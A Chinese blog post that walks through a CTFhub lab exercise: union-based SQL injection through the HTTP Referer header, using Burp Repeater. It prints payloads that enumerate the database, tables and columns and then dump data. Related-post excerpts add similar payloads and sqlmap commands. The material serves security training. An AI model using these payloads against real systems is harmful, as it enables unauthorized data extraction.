[CTFhub]CTFhub技能树SQL注入——Refer注入

最新推荐文章于 2024-10-18 20:49:14 发布
最新推荐文章于 2024-10-18 20:49:14 发布
阅读量625 收藏 2
点赞数 2
分类专栏: CTFhub 文章标签: web安全 安全 sql 网络安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KKleeeaa/article/details/128153144
版权
本文介绍了如何利用Refer注入进行数据获取,通过使用浏览器插件HackBarQuantum发送POST请求来抓取Refer,然后进行SQL注入,依次执行爆库、爆表和爆字段的操作,最终找到并提交Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

提示:本文章仅限学习参考,切勿用于非法用途

一、Refer注入

 

1.我们启动环境

2.HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

只有你向服务器提交申请的时候才会带上Refer,我们直接抓包是看不见Refer的

 所以我们要向服务器发送一个POST请求来获取它的Refer,这里可以用浏览器插件HackBar Quantum 可以在浏览器的插件里面搜索找到

然后我们随便给他一个POST请求,点击RUN运行  提示!!要抓包!!!!!!!!!!

 抓包结果如下图

我们可以看到有Refer了 然后我们选中全部 Send to Repeater

然后我们利用Refer进行传参

然后发现可以利用Refer进行传参数 然后就跟 手注 操作一样

先判断有无注入点,然后爆库 

爆库语句为以下语句

444 union select 1,database()

 

 然后我们爆出库里面的表

 444 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

然后我们爆出表里面的字段,注意表的名字跟我的可能有不同自己修改为自己的表名哦

444 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='fcavcxbduk'

最后一步就是爆出字段内容啦!!!!

444 union select 1,group_concat(seajrlikrw) from sqli.fcavcxbduk

 

 

然后找到Flag啦 去提交吧孩子!!!! 

感谢收看  本人第一次写文章 有不足的地方请多多提醒

CTFhub Refer注入
plant1234的博客
06-18 1438
Refer注入: 这道题首先我自己一开始也有点乱,找不到referer在哪里 但根据大佬的博客:https://blog.youkuaiyun.com/qq_37450949/article/details/117003065 提示的话知道,referer的一些知识: HTTP_REFERER简介 HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 这句话的意思就是,只有当你向浏
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1837
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入Refer注入、过滤空格)
CTFHub | Refer注入
尼泊罗河伯的博客
11-26 2143
根据题目显示内容,此题和上一题一致,需要在 Refer 请求头中进行 SQL 注入。那么直接使用 burp suite 抓包工具抓取题目网站的信息,并将抓取到的数据发送给重放器。在 Refer请求中使用 payload 进行测试,发现此题存在 Refer注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 ncdiyxjtck 数据中。
CTFHub - Refer注入
Have_a_great_day的博客
09-12 971
table_schema=database() :table_schema表示要筛选的表的模式(也就是数据库的名称),而database()是MySQL内置函数,返回当前连接的数据库名称。information_schema:是 information_schema 数据库中的一个表,用于存储关于数据库中所有表的信息,例:表名、所属数据库、表类型、创建时间等。group_concat(列或表达式):函数将指定的列或表达式的值按照默认的逗号分隔符连接起来,并返回一个合并的字符串作为结果。
CTFHUB-Cookie注入
Web学习之路
03-28 268
cookie啊
CTFHub-referer注入
m0_51589948的博客
05-19 920
referer注入 根据提示寻找referer,对其进行bp抓包,并发包到repeater 对referer进行注入判断 -1 union select 1,2 在注入后回显并显示内容,判断为Cookie注入,按照正常的注入流程获取flag -1 union select database(),1 查库名 然后查询数据库的表名 -1 union select 1,group select(table_name) feom information_schema.table where table_sche
CTFHUB-web-SQL注入
ookami6497的博客
11-29 976
CTFHUB SQL
CTFHub~SQL注入【MySQL结构+Cookie注入+UA注入+Refer注入+过滤空格】
weixin_67832625的博客
08-19 669
本文详细介绍了对后5段sql注入的类型,用最简单的语法和手法讲解了每一关的通过
CTFHub技能树.Web.SQL注入 WriteUp与SQL注入学习笔记
qq_45716477的博客
04-19 637
目录Level 1整数型注入字符型注入报错注入布尔盲注时间盲注欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 Level 1 整数型注入 输入1 and 1=1 和1 and 1=2 输
ctfhub——web——sql注入(sqlmap实现)
weixin_43906500的博客
05-13 1831
本次sql注入全部基于sqlmap实现 1.整数型注入 题目如下,为整数型注入 1.1安装sqlmap sudo apt install sqlmap 1.2测试注入 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.com:10080/?id=1 成功注入 1.3查看数据库 执行命令 sqlmap -u http://challenge-3c2c0ebf73b7a689.sandbox.ctfhub.
CTFHUB技能树SQL——Refer注入
weixin_73049307的博客
10-18 815
看样子可能不在数据库中,老样子,改成-1 union select 1,2#但是出错了,换成kali的sqlmap试了试也还是不行,不知道什么原因。得知vjrnfqmoar表和news表。回显错误,说明是整数型注入。得知pnzslmlazg列。直接挑明是Refer注入。回显错误,说明字段数是2。得知数据库名是sqli。
ctfhub Refer注入
weixin_43326436的博客
06-10 970
1,实验环境 ctfhubsql注入 2.工具 火狐浏览器,火狐浏览器插件hackbar(可以安装,百度。。。) 直接抓包,但是会看到没有我们想要的refer这个字样,我们在hackerbar里面输出需要的参数,id=1,提交时抓包,抓到我们所需要的字样。 3.在bp中refer字段这里进行爆库,输入123 union select (database()),2 # 后点击forward放包步骤接下来一样) 显示出了数据库是sqli 继续爆表 123 union select (select group_c
CTFHUB-技能树-Web题-SQL注入-Mysql结构-Refer注入
Static______的博客
04-09 1484
HTTP Referer是header的一部分,当浏览器向 web 服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。用bp抓到包后,将页面中的数据保存到一个txt文件中,用sqlmap爆破(根据reger注入level需要大于三)也就是说,只有当你向浏览器发送请求时,才会带上referer。得到两个表名,第一张表看名字像是自定义的表,尝试爆破第一张表。-p 指定参数,这里为 -p “id”1,2都显示,有两个回显字段。
CTFHUB-SQL注入-refer注入
u014794539的博客
07-10 517
考点 sql refer注入 过程分析 hackbar发送refer 然后发送repeater抓包 GET / HTTP/1.1 Host: challenge-966dbd291ece3e1d.sandbox.ctfhub.com:10800 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0 Accept: text/html,application/xhtml+xml
SQL注入13】referer注入基础及实践(基于BurpSuite工具和Sqli-labs-less19靶机平台)
Fighting_hawk的博客
02-21 5381
1. 了解referer的含义与作用; 2. 掌握referer注入的方法。
ctfhub技能树SQL注入referer注入
Naptmn的博客
02-07 1396
referer是什么? HTTP Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。 还是bp抓包 但是这次包中没有referer这个部分 所以我们需要添加一下(在headers中选add) 之后就可以在refere开始常规注入了 1、找位点 2、数据库名 3、表名 4、列名 5、查看数据 得到flag ...
CTFHUB-WEB-SQL注入-Refer注入
weixin_43486981的博客
08-11 1135
题目: 靶机环境: 使用burp suite 抓包,发现包信息中并没有refer字段。 根据提示,添加referer字段,进行注入 查看显示位 求数据库名 求表名 求列名 求字段值,得到flag
CTFHUB——Cookie、User-Agent、Referer注入 writeup
wuuconix's blog
08-29 934
背景 我们一般做sql注入的时候,注入点一般都是一个文本框,然后我们可以通过输入某种特殊的语句来获得数据库中的信息,但是有时候这种注入点可不一定给你一个文本框,而可能在请求包中的其他地方。 接下来我分享一下CTFHUB中的三道题,它们的注入点分别是请求包中的Cookie、User-Agent和Referer。它们只是注入点不同,基于的的注入方式都是最基本的union联合注入。所以它们的payload都十分简单和相似。 在这次做题过程中,我还尝试了强大的sqlmap,成功得到了一些结果。 SQL注入——Coo
CTFHub技能树web(持续更新)--SQL注入--Refer注入
jiuyongpinyin的博客
09-06 581
Refer注入 首先根据题目提示,实在referer处输入id,那么我们先抓包: 那么我们在发送包的时候携带上这个参数: 这里有回显了,接下来的事情就好办了,先通过order by语句查询几列,发现两列的时候回显正常,接着我们使用联合查询: 这里注入成功了,我们爆破当前数据库: 得到数据库,爆破数据库里面的表名: 得到了奇怪的表名,查看这个表名里面的列: 得到列名,之后爆破里面的字段: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正。 ...
ctf秀web316
最新发布
01-13
当面对可能存在SQL注入漏洞的目标站点时,`sqlmap`是一个强大的自动化渗透测试工具。通过设置特定参数来优化攻击策略,例如指定安全链接以绕过某些防护措施[^2]。 ```bash python sqlmap.py -u ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值